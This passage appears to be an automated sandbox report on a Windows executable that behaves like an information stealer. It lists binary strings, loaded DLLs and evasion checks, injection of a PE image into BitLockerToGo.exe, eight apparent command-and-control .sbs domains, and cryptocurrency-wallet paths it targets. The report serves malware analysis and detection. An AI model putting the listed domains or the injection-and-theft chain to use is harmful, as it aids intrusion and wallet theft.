scalar lengthita: method not foundjinzhu/gorm/.*test.gokey is not comparablelink has been severedlocalhost.localdomainmalformed profile: %vmethod is not allowedminimal-error-handlermode %v not supportedmysql_native_passwordnegative shift amountnot enough pixel datao1-preview-2024-09-12operator_interventionout of range of widthpackage not installedpanic on system stackpng: invalid format: pool has been stoppedpreempt at unknown pcprivilege_not_grantedprivilege_not_revokedread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argrequest_count_by_pathrtcp: too many chunksruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchserialization_failureset bit is not 0 or 1sql_routine_exceptionsrf_protocol_violatedstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestatement_too_complexstring_has_lower_casestring_has_upper_casestring_has_whitespacestring_is_credit_cardstring_is_dial_stringstring_is_hexadecimalstring_is_request_uristring_is_request_urlstring_is_utf_numericsuccessful_completiontag:yaml.org,2002:inttag:yaml.org,2002:maptag:yaml.org,2002:seqtag:yaml.org,2002:strtimer data corruptiontoo many coefficientstrace/breakpoint traptype %s not supportedtype is not cacheableundefined variable %qunexpected slice sizeunexpected value stepunexpected value typeunknown ABI part kindunknown empty Contextunknown field type %dunknown wire type: %dunmatched parenthesisunsupported extensionunsupported value: %funterminated_c_stringuser defined signal 1user defined signal 2utf8mb4_lithuanian_ciutf8mb4_vietnamese_ciwrite handler not setx509: invalid version into Go struct field #define ADDRESS_REPEAT#define ADDRESS_UNSAFE#define FILTER_NEAREST%SystemRoot%\system32\' is not a map to dive(Mutex::)?Un
              Source: gFCeeWNTvZ.exeString found in binary or memory: ^data:((?:\w+\/(?:([^;]|;[^;]).)+)?)accessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionchacha20: wrong HChaCha20 nonce sizecompare: need two params, but got %dcompressed name in SRV resource dataconverting NULL to %s is unsupportedcorrupted DB: table head data len %dcould not extract codec from rtcp-fbcrypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0crypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functiondate(%v, %v, %v, %v, %v, %v, %v, %v)deepObject=true not supported for %sdid not find expected <stream-start>did not find expected version numberdocument contains excessive aliasingedwards25519: invalid point encodingexpected [ character for array valueexpected an ECDSA public key, got %Tfail to read section relocations: %vfail to read string table length: %vfailure to read data directories: %vfunc TestRegression(t *testing.T) {
              Source: gFCeeWNTvZ.exeString found in binary or memory: \s*([[:xdigit:]]+)-([[:xdigit:]]+):\s*(\S+)(\s.*@)?([[:xdigit:]]+)?graphicscommand: IsInvalidated cannot be called on the screen imageinvalid DSN: network address not terminated (missing closing brace)opengl: creating framebuffer failed: gl.IsFramebuffer returns falsepacking: Extend cannot be called without rolling back or committingquery statement does not produce a result set (no top level SELECT)shareable: the image being shared is too big: width: %d, height: %d{{.Field}} must be a valid IP address (either IPv4 or Ipv6 address){{.Field}} must contain English letters and digits only (a-zA-Z0-9)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066298881FileAlignment lesser than 0x200 and different from section alignment^[ABCEGHJKLMNPRSTVXY]\d[ABCEGHJ-NPRSTV-Z][ ]?\d[ABCEGHJ-NPRSTV-Z]\d$big: invalid 2nd argument to Int.Jacobi: need odd integer but got %scrypto/hmac: hash generation function does not produce unique valuesdamaged Import Table information. ILT and/or IAT appear to be brokendecoding int array or slice: length exceeds input size (%d elements)embedded IPv4 address must replace the final 2 fields of the addressexpected SCALAR, SEQUENCE-START, MAPPING-START, or ALIAS, but got %vexpected logical or operator or one of [$end, ')', ',', ';', OR, ||]expected one of [$end, ')', ';', GROUP, LIMIT, OFFSET, ORDER, WHERE]expecting the prefix to be the "urn" string (whatever case) [col %d]go package net: built with netgo build tag; using Go's DNS resolver
              Source: gFCeeWNTvZ.exeString found in binary or memory: decoding complex128 array or slice: length exceeds input size (%d elements)invalid operation: %v << %v (shift count type %T, must be unsigned integer)pkcs7: cannot encrypt content: only DES-CBC, AES-CBC, and AES-GCM supportedthe optional header size is %d < 68, which is insufficient for authenticodetls: internal error: attempted to read record with pending application dataCondense cannot operate on collections whose last element is a wrap functionexpected UPDATE statement optional WHERE clause or one of [$end, ';', WHERE]optional header size(%d) is less minimum size (%d) for PE32+ optional headertls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuiteINSERT INTO %v (%v) SELECT %v %v WHERE NOT EXISTS (SELECT * FROM %v WHERE %v)MapIter.Next called on an iterator that does not have an associated map Value^([a-zA-Z0-9]{1}[a-zA-Z0-9-]{0,62}){1}(\.[a-zA-Z0-9]{1}[a-zA-Z0-9-]{0,62})*?$^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$crypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabledexpected CREATE INDEX optional UNIQUE clause or one of [INDEX, TABLE, UNIQUE]expected logical or operator or one of [$end, ')', ',', ';', DEFAULT, OR, ||]expected optional comma or one of [$end, ')', ',', ';', LIMIT, OFFSET, ORDER]header extension id must be between 1 and 14 for RFC 5285 one byte extensionsreceived a non-starting FU-A packet without any previous FU-A starting packet115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951RVA AddressOfNames in the export directory points to an invalid address: 0x%x
              Source: gFCeeWNTvZ.exeString found in binary or memory: net/addrselect.go
              Source: gFCeeWNTvZ.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: gFCeeWNTvZ.exeString found in binary or memory: github.com/hajimehoshi/ebiten@v1.12.12/internal/glfw/load_windows.go
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeFile read: C:\Users\user\Desktop\gFCeeWNTvZ.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\gFCeeWNTvZ.exe "C:\Users\user\Desktop\gFCeeWNTvZ.exe"
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: dinput8.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: xinput1_4.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32Jump to behavior
              Source: gFCeeWNTvZ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: gFCeeWNTvZ.exeStatic file information: File size 48627712 > 1048576
              Source: gFCeeWNTvZ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7fe600
              Source: gFCeeWNTvZ.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x7a4e00
              Source: gFCeeWNTvZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: gFCeeWNTvZ.exeStatic PE information: section name: .symtab
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /4
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /19
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /31
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /45
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /57
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /70
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /81
              Source: glfw.3927611081.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_12766666 push ecx; retf 0_3_127666C4
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276C03C push ds; retn 000Ah0_3_1276C13A
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276A816 push esp; iretd 0_3_1276A81D
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_127648E6 push esp; iretd 0_3_127648ED
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_127600E0 push esp; iretd 0_3_127600E1
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276B9DE pushfd ; iretd 0_3_1276B9DD
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276B4B6 push edi; iretd 0_3_1276B4C5
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276B998 pushfd ; iretd 0_3_1276B9DD
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1247B4AB pushad ; iretd 0_3_1247B561
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 push ecx; mov dword ptr [esp], 64631695h0_2_64608A19
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 push esi; mov dword ptr [esp], 646316DBh0_2_64608A75
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 push esi; mov dword ptr [esp], 6463170Eh0_2_64608AB8
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460C519 push eax; mov dword ptr [esp], 00003839h0_2_6460C7F6
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646094CB push ecx; mov dword ptr [esp], eax0_2_6460969D
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646094CB push edx; mov dword ptr [esp], eax0_2_6460974A
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460B169 push ebx; mov dword ptr [esp], esi0_2_6460B1BB
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460B26A push ecx; mov dword ptr [esp], eax0_2_6460B46F
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460BA29 push edx; mov dword ptr [esp], eax0_2_6460BA62
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460DEEC push esi; mov dword ptr [esp], ebx0_2_6460DF4E
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460B6B7 push eax; mov dword ptr [esp], 00003839h0_2_6460B703
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460737C push esi; mov dword ptr [esp], ebx0_2_6460755C
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460737C push ecx; mov dword ptr [esp], ebx0_2_646076B0
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460AB26 push eax; mov dword ptr [esp], edi0_2_6460AB76
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460AB26 push edx; mov dword ptr [esp], ebx0_2_6460AB80
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64601B16 push eax; mov dword ptr [esp], ebx0_2_64601EB5
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460ABC8 push eax; mov dword ptr [esp], esi0_2_6460AC76
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64605394 push ecx; mov dword ptr [esp], eax0_2_6460E36D
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeFile created: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dllJump to dropped file
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460CD2B IsIconic,0_2_6460CD2B
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dllJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7856Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7856Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhq
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1864614530.00000000008BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00558160 LdrInitializeThunk,2_2_00558160
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646105EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_646105EC
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646105F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_646105F0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000 value starts with: 4D5AJump to behavior
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tamedgeesy.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: relalingj.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rottieud.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: brownieyuz.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: explainvees.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ducksringjk.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thinkyyokej.sbs
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: repostebhu.sbs
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 721008Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 521000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 55D000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 560000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 571000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 572000Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64610530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_64610530
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646031E0 glfwGetVersion,0_2_646031E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000A9D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: gFCeeWNTvZ.exe PID: 7564, type: MEMORYSTR
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: gFCeeWNTvZ.exe, 00000000.00000000.1676171529.00000000014B9000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: github.com/go-playground/validator/v10.isEthereumAddress
